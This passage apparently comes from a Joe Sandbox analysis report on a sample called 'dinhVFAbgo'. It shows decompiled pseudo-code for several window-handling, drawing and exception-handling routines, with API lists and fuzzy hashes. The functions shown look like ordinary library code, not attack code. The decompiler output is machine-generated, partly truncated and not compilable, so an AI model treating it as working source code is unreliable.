(, xrefs: 00CDAA28

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
String ID: (
API String ID: 2680359821-3887548279
Opcode ID: f7008756406a1d72a2067b58d45521ced7c0a0bfd99ed38d359dd888471b875e
Instruction ID: a1af42fb228de5eaf65cd7f09baf9da04698d24bbae7a3c4383db5294b58e644
Opcode Fuzzy Hash: f7008756406a1d72a2067b58d45521ced7c0a0bfd99ed38d359dd888471b875e
Instruction Fuzzy Hash: 4E51F371D00208AFDF24EFA5C946AEEBBB5FF04300F14812AE516AB291DB749A09DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5069 Relevance: 10.6, APIs: 7, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CB5069(intOrPtr* __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				struct tagMSG* _v16;
				struct HWND__* _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				struct HWND__* _t44;
				struct tagMSG* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t52;
				int _t53;
				struct HWND__* _t57;
				struct tagMSG* _t61;
				long _t65;
				intOrPtr* _t68;
				void* _t70;
				intOrPtr* _t71;
				signed int _t73;
				struct tagMSG* _t75;

				_t70 = __edx;
				_t66 = __ecx;
				_t65 = 0;
				_t73 = 1;
				_t71 = __ecx;
				_v8 = 1;
				if((_a4 & 0x00000004) == 0 || (E00CB778C(__ecx) & 0x10000000) != 0) {
					_t73 = 0;
				}
				_v12 = _t73;
				_t44 = GetParent( *(_t71 + 0x20));
				 *(_t71 + 0x60) =  *(_t71 + 0x60) | 0x00000018;
				_v20 = _t44;
				_t45 = E00CAC650( *(_t71 + 0x60));
				_v16 = _t45;
				L4:
				while(1) {
					L4:
					if(_v8 == 0) {
						while(1) {
							L16:
							_t46 = E00CAC86D(_t66, _t70, _t73, __eflags);
							__eflags = _t46;
							if(_t46 == 0) {
								break;
							}
							__eflags = _t73;
							if(_t73 == 0) {
								L21:
								 *0xe17a64();
								_t68 = _t71;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0x88))))();
								if(__eflags == 0) {
									 *(_t71 + 0x60) =  *(_t71 + 0x60) & 0xffffffe7;
									return  *((intOrPtr*)(_t71 + 0x68));
								}
								_t75 = _v16;
								_t52 = E00CAC7D8(_t65, _t68, _t75, __eflags);
								_t66 = _t75;
								__eflags = _t52;
								if(_t52 != 0) {
									_v8 = 1;
									_t65 = 0;
									__eflags = 0;
								}
								_t53 = PeekMessageA(_t75, 0, 0, 0, 0);
								_t73 = _v12;
								__eflags = _t53;
								if(__eflags != 0) {
									continue;
								} else {
									_t45 = _v16;
									goto L4;
								}
							}
							_t61 = _v16;
							__eflags = _t61->message - 0x118;
							if(_t61->message == 0x118) {
								L20:
								E00CB7B32(_t71, 1);
								UpdateWindow( *(_t71 + 0x20));
								_t34 =  &_v12;
								 *_t34 = _v12 & 0x00000000;
								__eflags =  *_t34;
								goto L21;
							}
							__eflags = _t61->message - 0x104;
							if(_t61->message != 0x104) {
								goto L21;
							}
							goto L20;
						}
						_push(0);
						E00CBBAFD();
						_t47 = _t46 | 0xffffffff;
						__eflags = _t47;
						return _t47;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t66 = 0;
						if(PeekMessageA(_t45, 0, 0, 0, 0) != 0) {
							goto L16;
						}
						if(_t73 != 0) {
							_t66 = _t71;
							E00CB7B32(_t71, 1);
							UpdateWindow( *(_t71 + 0x20));
							_t73 = 0;
							_v12 = 0;
						}
						if((_a4 & 0x00000001) == 0) {
							_t57 = _v20;
							if(_t57 != 0 && _t65 == 0) {
								SendMessageA(_t57, 0x121, _t65,  *(_t71 + 0x20));
							}
						}
						if((_a4 & 0x00000002) != 0) {
							L15:
							_t28 =  &_v8;
							 *_t28 = _v8 & 0x00000000;
							__eflags =  *_t28;
							goto L16;
						} else {
							_t65 = _t65 + 1;
							if(SendMessageA( *(_t71 + 0x20), 0x36a, 0, _t65) == 0) {
								goto L15;
							}
							_t45 = _v16;
							continue;
						}
					}
					goto L16;
				}
			}

0x00cb5069
0x00cb5069
0x00cb5073
0x00cb5075
0x00cb507b
0x00cb507d
0x00cb5080
0x00cb508e
0x00cb508e
0x00cb5093
0x00cb5096
0x00cb509c
0x00cb50a0
0x00cb50a3
0x00cb50a8
0x00000000
0x00cb50ab
0x00cb50ab
0x00cb50af
0x00cb5129
0x00cb5129
0x00cb5129
0x00cb512e
0x00cb5130
0x00000000
0x00000000
0x00cb5136
0x00cb5138
0x00cb5165
0x00cb516f
0x00cb5175
0x00cb5179
0x00cb517b
0x00cb51b6
0x00000000
0x00cb51ba
0x00cb517d
0x00cb5181
0x00cb5186
0x00cb5187
0x00cb5189
0x00cb518b
0x00cb5192
0x00cb5192
0x00cb5192
0x00cb519d
0x00cb51a3
0x00cb51a6
0x00cb51a8
0x00000000
0x00cb51ae
0x00cb51ae
0x00000000
0x00cb51ae
0x00cb51a8
0x00cb513a
0x00cb513d
0x00cb5144
0x00cb514f
0x00cb5153
0x00cb515b
0x00cb5161
0x00cb5161
0x00cb5161
0x00000000
0x00cb5161
0x00cb5146
0x00cb514d
0x00000000
0x00000000
0x00000000
0x00cb514d
0x00cb51bf
0x00cb51c1
0x00cb51c6
0x00cb51c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb50b1
0x00cb50b1
0x00cb50b1
0x00cb50c0
0x00000000
0x00000000
0x00cb50c4
0x00cb50c8
0x00cb50ca
0x00cb50d2
0x00cb50d8
0x00cb50da
0x00cb50da
0x00cb50e1
0x00cb50e3
0x00cb50e8
0x00cb50f8
0x00cb50f8
0x00cb50e8
0x00cb5102
0x00cb5125
0x00cb5125
0x00cb5125
0x00cb5125
0x00000000
0x00cb5104
0x00cb510f
0x00cb5118
0x00000000
0x00000000
0x00cb5120
0x00000000
0x00cb5120
0x00cb5102
0x00000000
0x00cb50b1

APIs

GetParent.USER32(?), ref: 00CB5096
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00CB50B8
UpdateWindow.USER32(?), ref: 00CB50D2
SendMessageA.USER32(?,00000121,00000001,?), ref: 00CB50F8
SendMessageA.USER32(?,0000036A,00000000,00000000), ref: 00CB5110
UpdateWindow.USER32(?), ref: 00CB515B
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB519D

Part of subcall function 00CB778C: GetWindowLongA.USER32 ref: 00CB7799

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a16f86d95d6ef0de41a9a00bab3bd701cf25d055535a2bff37395d22191b5d0
Instruction ID: 4c171db052599abd89ff4851a2879a344c2c7146f1fee7924f1b2da40eb3b405
Opcode Fuzzy Hash: 1a16f86d95d6ef0de41a9a00bab3bd701cf25d055535a2bff37395d22191b5d0
Instruction Fuzzy Hash: 4441E230A00A19AFEB149FA9CC89BEE7BB4BF00B05F148159F811A71D0DBB0DE40DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00CC80C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00CC80C8(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t80;
				intOrPtr _t89;
				int _t90;
				void* _t103;
				intOrPtr _t105;
				void* _t109;
				void* _t112;

				_t112 = __fp0;
				_t102 = __edi;
				_t101 = __edx;
				_push(0x2c);
				E00DDD55F(0xe093b8, __ebx, __edi, __esi);
				_t105 = __ecx;
				 *((intOrPtr*)(_t109 - 0x34)) = __ecx;
				_t57 =  *((intOrPtr*)(__ecx + 0x7ec));
				if(_t57 == 0) {
					_t103 = __ecx + 0x7b8;
					__eflags =  *((intOrPtr*)(__ecx + 0x7c0));
					if(__eflags == 0) {
						E00D1C0BA(__ecx, __edx, 0, _t103);
					}
					_t89 = E00CA9583(__eflags, 0x1fe8);
					 *((intOrPtr*)(_t109 - 0x38)) = _t89;
					 *(_t109 - 4) = 0;
					__eflags = _t89;
					if(__eflags == 0) {
						_t90 = 0;
					} else {
						_push( *((intOrPtr*)(_t105 + 0x7b4)));
						_push( *((intOrPtr*)(_t105 + 0x7e8)));
						_push(_t105 + 0x7cc);
						_push( *((intOrPtr*)(_t105 + 0x7f4)));
						_push( *((intOrPtr*)(_t105 + 0x7f0)));
						_push( *((intOrPtr*)(_t105 + 0x7f8)));
						_push( *((intOrPtr*)(_t105 + 0x7b0)));
						_push(_t103);
						_push(_t105);
						_t90 = E00CC76A9(_t89, _t101, _t105, __eflags, _t112);
					}
					 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t105 + 0x7ec)) = _t90;
					 *((intOrPtr*)(_t90 + 0x1fe0)) =  *((intOrPtr*)(_t105 + 0x7a8));
					 *(_t109 - 0x20) = 0;
					 *((intOrPtr*)(_t109 - 0x1c)) = 0;
					 *((intOrPtr*)(_t109 - 0x18)) = 0;
					 *((intOrPtr*)(_t109 - 0x14)) = 0;
					GetWindowRect( *(_t105 + 0x20), _t109 - 0x20);
					_t102 =  *((intOrPtr*)(_t105 + 0x7ec));
					_t63 =  *((intOrPtr*)(_t109 - 0x34));
					 *0xe17a64(_t63,  *(_t109 - 0x20),  *((intOrPtr*)(_t109 - 0x14)), 0,  *((intOrPtr*)(_t63 + 0x7a8)), 0);
					_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x7ec)))) + 0x210))))();
					_t105 =  *((intOrPtr*)(_t109 - 0x34));
					__eflags = _t65;
					if(_t65 != 0) {
						__eflags =  *((intOrPtr*)(_t105 + 0x7a8));
						if( *((intOrPtr*)(_t105 + 0x7a8)) != 0) {
							_t102 =  *((intOrPtr*)(_t105 + 0x7ec));
							 *0xe17a64();
							_t80 = E00CACA6C(" B\xef\xbf\xbd",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x7ec)))) + 0x1c8							_t105 =  *((intOrPtr*)(_t109 - 0x34));
							__eflags = _t80;
							if(_t80 != 0) {
								 *((intOrPtr*)(_t80 + 0xe00)) = 1;
							}
						}
						 *(_t109 - 0x30) = 0;
						 *((intOrPtr*)(_t109 - 0x2c)) = 0;
						 *((intOrPtr*)(_t109 - 0x28)) = 0;
						 *((intOrPtr*)(_t109 - 0x24)) = 0;
						GetWindowRect( *( *((intOrPtr*)(_t105 + 0x7ec)) + 0x20), _t109 - 0x30);
						E00D169B0( *((intOrPtr*)(_t105 + 0x7ec)), _t101, _t102, _t109 - 0x30);
						__eflags =  *((intOrPtr*)(_t105 + 0x7ac));
						if( *((intOrPtr*)(_t105 + 0x7ac)) != 0) {
							_t102 =  *((intOrPtr*)(_t105 + 0x7ec));
							 *0xe17a64();
							E00CB7A0A(0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x7ec)))) + 0x1c8))))(), _t101);
							_t105 =  *((intOrPtr*)(_t109 - 0x34));
						}
					} else {
						 *((intOrPtr*)(_t105 + 0x7ec)) = 0;
					}
					__eflags =  *((intOrPtr*)(_t105 + 0xb8));
					if( *((intOrPtr*)(_t105 + 0xb8)) != 0) {
						ReleaseCapture();
						 *((intOrPtr*)(_t105 + 0xb8)) = 0;
					}
					goto L16;
				} else {
					SendMessageA( *(_t57 + 0x20), 0x10, 0, 0);
					 *((intOrPtr*)(_t105 + 0x7ec)) = 0;
					L16:
					return E00DDD50E(0, _t102, _t105);
				}
			}

0x00cc80c8
0x00cc80c8
0x00cc80c8
0x00cc80c8
0x00cc80cf
0x00cc80d4
0x00cc80d6
0x00cc80d9
0x00cc80e3
0x00cc80fd
0x00cc8103
0x00cc8109
0x00cc810d
0x00cc810d
0x00cc811d
0x00cc811f
0x00cc8122
0x00cc8125
0x00cc8127
0x00cc815f
0x00cc8129
0x00cc8129
0x00cc8135
0x00cc813b
0x00cc813c
0x00cc8142
0x00cc8148
0x00cc814e
0x00cc8154
0x00cc8155
0x00cc815b
0x00cc815b
0x00cc8167
0x00cc816b
0x00cc8171
0x00cc817e
0x00cc8181
0x00cc8184
0x00cc8187
0x00cc818a
0x00cc8190
0x00cc81a1
0x00cc81b2
0x00cc81ba
0x00cc81bc
0x00cc81bf
0x00cc81c1
0x00cc81ce
0x00cc81d4
0x00cc81d6
0x00cc81e6
0x00cc81f6
0x00cc81fb
0x00cc8200
0x00cc8202
0x00cc8204
0x00cc8204
0x00cc8202
0x00cc8211
0x00cc821b
0x00cc821e
0x00cc8221
0x00cc8227
0x00cc8237
0x00cc823c
0x00cc8242
0x00cc8244
0x00cc8254
0x00cc8260
0x00cc8265
0x00cc8265
0x00cc81c3
0x00cc81c3
0x00cc81c3
0x00cc8268
0x00cc826e
0x00cc8270
0x00cc8276
0x00cc8276
0x00000000
0x00cc80e5
0x00cc80ec
0x00cc80f2
0x00cc827c
0x00cc8281
0x00cc8281

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC80CF
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00CC80EC
GetWindowRect.USER32 ref: 00CC818A
ReleaseCapture.USER32(?), ref: 00CC8270

Strings

B, xrefs: 00CC81F1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CaptureH_prolog3_MessageRectReleaseSendWindow
String ID: B
API String ID: 1034054131-1120772724
Opcode ID: 1cd08dbaa51c48e2de04ef78251ca5884baa5dd2251b60e7700957693500d8fc
Instruction ID: 9536e56f569a8d631cc8c07d6991ada85922c5163670df082320c30fe3079d05
Opcode Fuzzy Hash: 1cd08dbaa51c48e2de04ef78251ca5884baa5dd2251b60e7700957693500d8fc
Instruction Fuzzy Hash: F6515A75D097059FCB119FA5D884AEEBBFAFF48300F14446EE46AA3251CB346A41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D0814C Relevance: 10.6, APIs: 7, Instructions: 123
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D0814C(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t82;
				void* _t108;
				intOrPtr _t112;
				void* _t116;

				_t108 = __edx;
				_t86 = __ebx;
				_push(0x64);
				E00DDD55F(0xe0c2a4, __ebx, __edi, __esi);
				_t114 = __ecx;
				 *((intOrPtr*)(_t116 - 0x24)) = __ecx;
				_t112 =  *((intOrPtr*)(_t116 + 8));
				if(_t112 != 0) {
					_t119 =  *(_t112 + 4);
					if( *(_t112 + 4) != 0) {
						E00CB9032(_t116 - 0x34);
						_t86 = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E00CB9B84(0, _t116 - 0x34, CreateCompatibleDC( *(_t112 + 4)));
						 *(_t116 - 0x20) = 0;
						 *((intOrPtr*)(_t116 - 0x1c)) = 0;
						 *((intOrPtr*)(_t116 - 0x18)) = 0;
						 *((intOrPtr*)(_t116 - 0x14)) = 0;
						GetClientRect( *(_t114 + 0x20), _t116 - 0x20);
						E00CD9E8B(_t116 - 0x70);
						 *((char*)(_t116 - 4)) = 1;
						E00CDB89C(_t108, _t119,  *((intOrPtr*)(_t116 - 0x18)) -  *(_t116 - 0x20),  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c)), 0x20, 0, 0, 1);
						if( *(_t116 - 0x6c) != 0) {
							_t86 = SelectObject( *(_t116 - 0x30),  *(_t116 - 0x6c));
						}
						BitBlt( *(_t116 - 0x30), 0, 0,  *((intOrPtr*)(_t116 - 0x18)) -  *(_t116 - 0x20),  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c)),  *(_t112 + 4), 0, 0, 0xcc0020);
						E00CBA56C(_t116 - 0x34, _t116 - 0x3c, 0, 0);
						E00CBA5F8(_t116 - 0x34, _t116 - 0x3c, 0, 0);
						E00CBA3FF(_t116 - 0x34, 1);
						 *0xe17a64(_t116 - 0x34, 0);
						 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x188))))();
						_t114 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 - 0x24)))) + 0x19c));
						 *0xe17a64(_t116 - 0x34);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 - 0x24)))) + 0x19c))))();
						_t82 = BitBlt( *(_t112 + 4), 0, 0,  *((intOrPtr*)(_t116 - 0x18)) -  *(_t116 - 0x20),  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c)),  *(_t116 - 0x30), 0, 0, 0xcc0020);
						if(_t86 != 0) {
							_t82 = SelectObject( *(_t116 - 0x30), _t86);
						}
						E00CDA12B(_t82, _t116 - 0x70);
						E00CB91A4(_t116 - 0x34);
					}
				}
				return E00DDD50E(_t86, _t112, _t114);
			}

0x00d0814c
0x00d0814c
0x00d0814c
0x00d08153
0x00d08158
0x00d0815a
0x00d0815d
0x00d08162
0x00d08168
0x00d0816c
0x00d08175
0x00d0817d
0x00d0817f
0x00d0818c
0x00d08194
0x00d0819b
0x00d0819e
0x00d081a1
0x00d081a4
0x00d081ad
0x00d081c9
0x00d081cd
0x00d081d5
0x00d081e3
0x00d081e3
0x00d08204
0x00d08215
0x00d08225
0x00d0822f
0x00d08244
0x00d0824d
0x00d08258
0x00d08260
0x00d08269
0x00d0828a
0x00d08292
0x00d08298
0x00d08298
0x00d082a1
0x00d082a9
0x00d082a9
0x00d0816c
0x00d082b5

APIs

__EH_prolog3_GS.LIBCMT ref: 00D08153
CreateCompatibleDC.GDI32(?), ref: 00D08182
GetClientRect.USER32(?,?), ref: 00D081A4
SelectObject.GDI32(?,?), ref: 00D081DD
BitBlt.GDI32(?,00000000,00000000,?,?,00000001,00000000,00000000,00CC0020), ref: 00D08204
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00D0828A
SelectObject.GDI32(?,00000000), ref: 00D08298

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ObjectSelect$ClientCompatibleCreateH_prolog3_Rect
String ID:
API String ID: 1651110115-0
Opcode ID: 4e72af0ee1bb47d3cf582762afc643ed3fbe5ab3da36a053ade7791032304c47
Instruction ID: eb933798037d7271ec66dea3ba1949afb22a855953d2a1af4bd28d78cf750c67
Opcode Fuzzy Hash: 4e72af0ee1bb47d3cf582762afc643ed3fbe5ab3da36a053ade7791032304c47
Instruction Fuzzy Hash: 8741C371A10209AFDF14EFA4DD85EEEBBB9FF48700F148119F545B2291DA716E04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DDF4E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00DDF4E0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr* _t72;
				intOrPtr _t73;
				signed int _t77;
				char _t79;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr* _t94;
				void* _t98;
				void* _t100;
				void* _t107;

				_t85 = __edx;
				_t72 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t72 = E00E07782(__ecx,  *_t72);
				_t73 = _a8;
				_t6 = _t73 + 0x10; // 0x11
				_t92 = _t6;
				_push(_t92);
				_v20 = _t92;
				_v12 =  *(_t73 + 8) ^  *0xe68dd4;
				E00DDF4A0(_t73, __edx, __edi, _t92,  *(_t73 + 8) ^  *0xe68dd4);
				E00DE1CAC(_a12);
				_t52 = _a4;
				_t100 = _t98 - 0x1c + 0x10;
				_t89 =  *((intOrPtr*)(_t73 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t89 - 0xfffffffe;
					if(_t89 != 0xfffffffe) {
						_t85 = 0xfffffffe;
						E00DE1E30(_t73, 0xfffffffe, _t92, 0xe68dd4);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t73 - 4)) =  &_v32;
					if(_t89 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t77 = _v12;
							_t59 = _t89 + (_t89 + 2) * 2;
							_t73 =  *((intOrPtr*)(_t77 + _t59 * 4));
							_t60 = _t77 + _t59 * 4;
							_t78 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t79 = _v5;
								goto L7;
							} else {
								_t85 = _t92;
								_t61 = E00DE1DD0(_t78, _t92);
								_t79 = 1;
								_v5 = 1;
								_t107 = _t61;
								if(_t107 < 0) {
									_v16 = 0;
									L13:
									_push(_t92);
									E00DDF4A0(_t73, _t85, _t89, _t92, _v12);
									goto L14;
								} else {
									if(_t107 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xe3ff40;
											if(__eflags != 0) {
												_t68 = E00E06E60(__eflags, 0xe3ff40);
												_t100 = _t100 + 4;
												__eflags = _t68;
												if(_t68 != 0) {
													_t94 =  *0xe3ff40; // 0xddf2d5
													 *0xe17a64(_a4, 1);
													 *_t94();
													_t92 = _v20;
													_t100 = _t100 + 8;
												}
												_t62 = _a4;
											}
										}
										_t86 = _t62;
										E00DE1E10(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t89;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t89) {
											_t86 = _t89;
											E00DE1E30(_t64, _t89, _t92, 0xe68dd4);
											_t64 = _a8;
										}
										_push(_t92);
										 *((intOrPtr*)(_t64 + 0xc)) = _t73;
										E00DDF4A0(_t73, _t86, _t89, _t92, _v12);
										E00DE1DF0();
										asm("int3");
										_t66 =  *0xe89014; // 0x0
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L23;
							L7:
							_t89 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t79 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L23:
			}

0x00ddf4e0
0x00ddf4e7
0x00ddf4eb
0x00ddf4ec
0x00ddf4f2
0x00ddf4fe
0x00ddf500
0x00ddf506
0x00ddf506
0x00ddf50f
0x00ddf511
0x00ddf514
0x00ddf517
0x00ddf51f
0x00ddf524
0x00ddf527
0x00ddf52a
0x00ddf531
0x00ddf58d
0x00ddf590
0x00ddf598
0x00ddf59f
0x00000000
0x00ddf59f
0x00000000
0x00ddf533
0x00ddf533
0x00ddf539
0x00ddf53f
0x00ddf545
0x00ddf5b0
0x00ddf5b9
0x00ddf547
0x00ddf547
0x00ddf547
0x00ddf54d
0x00ddf550
0x00ddf553
0x00ddf556
0x00ddf559
0x00ddf55e
0x00ddf574
0x00000000
0x00ddf560
0x00ddf560
0x00ddf562
0x00ddf567
0x00ddf569
0x00ddf56c
0x00ddf56e
0x00ddf584
0x00ddf5a4
0x00ddf5a4
0x00ddf5a8
0x00000000
0x00ddf570
0x00ddf570
0x00ddf5ba
0x00ddf5bd
0x00ddf5c3
0x00ddf5c5
0x00ddf5cc
0x00ddf5d3
0x00ddf5d8
0x00ddf5db
0x00ddf5dd
0x00ddf5df
0x00ddf5ec
0x00ddf5f2
0x00ddf5f4
0x00ddf5f7
0x00ddf5f7
0x00ddf5fa
0x00ddf5fa
0x00ddf5cc
0x00ddf600
0x00ddf602
0x00ddf607
0x00ddf60a
0x00ddf60d
0x00ddf615
0x00ddf619
0x00ddf61e
0x00ddf61e
0x00ddf621
0x00ddf625
0x00ddf628
0x00ddf638
0x00ddf63d
0x00ddf63e
0x00ddf643
0x00ddf572
0x00000000
0x00ddf572
0x00ddf570
0x00ddf56e
0x00000000
0x00ddf577
0x00ddf577
0x00ddf579
0x00ddf580
0x00000000
0x00ddf582
0x00000000
0x00ddf580
0x00ddf545
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00DDF517
___except_validate_context_record.LIBVCRUNTIME ref: 00DDF51F
_ValidateLocalCookies.LIBCMT ref: 00DDF5A8
__IsNonwritableInCurrentImage.LIBCMT ref: 00DDF5D3
_ValidateLocalCookies.LIBCMT ref: 00DDF628

Strings

csm, xrefs: 00DDF5BD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7e3f83177673f89b820f27d86e6d126542a5414207e93d9ea8a83dee8f025557
Instruction ID: 47aa1867875c04c6339fb81803b805fcff7ddd21efdce2ba4f3fce09a5eec7ea
Opcode Fuzzy Hash: 7e3f83177673f89b820f27d86e6d126542a5414207e93d9ea8a83dee8f025557
Instruction Fuzzy Hash: B641A634E002099FCF10DF69D885A9E7BB5EF45324F1881A6F815AB392D731EA15CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD4665 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 73%

